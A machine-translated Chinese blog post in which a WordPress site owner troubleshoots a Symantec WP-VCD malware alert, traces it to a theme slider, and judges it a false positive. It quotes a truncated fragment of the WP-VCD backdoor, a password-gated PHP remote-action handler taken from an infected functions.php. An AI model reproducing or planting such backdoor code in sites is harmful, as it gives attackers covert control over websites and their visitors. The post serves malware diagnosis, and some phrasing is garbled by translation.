这是我访问WordPress网站www.51sec.org时得到的信息。看起来非常有趣,我想知道已检测到什么。

基于警告消息和SID,我可以从Symantec找到以下详细信息 (Broadcom)网站:

================================================== ========================

Web攻击:恶意主题或插件下载2

严重程度:

此攻击可能构成严重的安全威胁。您应立即采取行动以停止任何损坏或防止发生进一步的损坏。

描述

此签名检测与WP-VCD感染相关的恶意活动。

附加信息

光盘是与WordPress网站相关的恶意软件感染。它通过由相关站点网络分发的空插件和主题进行传播。此感染导致黑帽SEO活动(旨在操纵搜索
引擎代表攻击者),并插入恶意代码,从而为查看受感染网站的用户创建潜在的危险重定向和弹出广告。

受影响的

  • WordPress网站

================================================== ========================


I 一直在研究这种WP-VCD感染,并认为我的网站可能已感染。这是我找到的 光盘.


================================================== ========================

光盘感染本身通过“零”或盗版的插件和主题传播,这些插件和主题由相关站点的网络分发,并且在部署后会以惊人的方式传播。在幕后,大量的命令和控制(C2)基础结构以及自我修复感染使攻击者能够在这些感染站点上保持立足之地。
1
2
3
4
5
6
7
8
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '2f3ad13e4908141130e292bf8aa67474'))
    {
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
    case 'change_domain';
    if (isset($_REQUEST['newdomain']))
上面的代码段来自受WP-VCD感染的站点上的受感染的functions.php文件。由于该广告系列的盛行,具有处理WordPress恶意软件感染经验的任何人都可以立即识别出此示例。
=================================================== ========================

在开始比较备份文件和当前文件以找出此WP-VCD代码注入到哪里之前,我正在考虑首先尝试其他一些步骤。

通过查看Symantec Endpoint Protection,我看不到任何详细信息。

有趣的是,此警告仅显示在首页上,而不显示在本网站的其他页面上。这是我注意到的第一件事。如果是主题或插件被感染,是否所有页面都收到此警告?

1.在线漏洞扫描,安全检查
我找不到其他任何在线扫描工具来警告类似的东西。

2.升级主题和插件
所有主题和插件均已升级到最新版本。

3.停用插件
检查所有相关插件并逐个停用它们,以查看是否有帮助,但没有发现任何问题。

4.专注于发现的有趣事物
最终,我在想与第一个首页和其他页面有什么不同。第一页上仅显示滑块设置。

我决定关闭所有页面上的Slider设置,如以下屏幕截图所示,然后烦人的警告消息消失了。

5.安装 malcare插件 扫描整个网站,却没有发现我的网站。
这是用于站点安全的相当不错且有用的软件,它将抓取一些数据库表和所有站点文件到其云服务器以进行扫描。 光盘签名绝对在其数据库中。如果有任何与WP-VCD相关的问题,Malcare会找出来。

6.我最后的选择是比较备份文件。
这将花费一些时间。很高兴我能够找到导致此的滑块。它可能与“通过竞争主题启动博客主题”中的滑块代码有关。

综上所述,根据我今天上午的故障排除,这对Symantec Endpoint Protection软件只是误判。赛门铁克安全性已经被Broadcom收购了一段时间。赛门铁克产品的未来尚不清楚。我可能需要考虑改用其他安全软件。

Note. This message 上ly happens to Chrome browser , not Edge. It has been reported to 赛门铁克 Review site – //symsubmit.symantec.com/





参考文献

通过 约翰

发表评论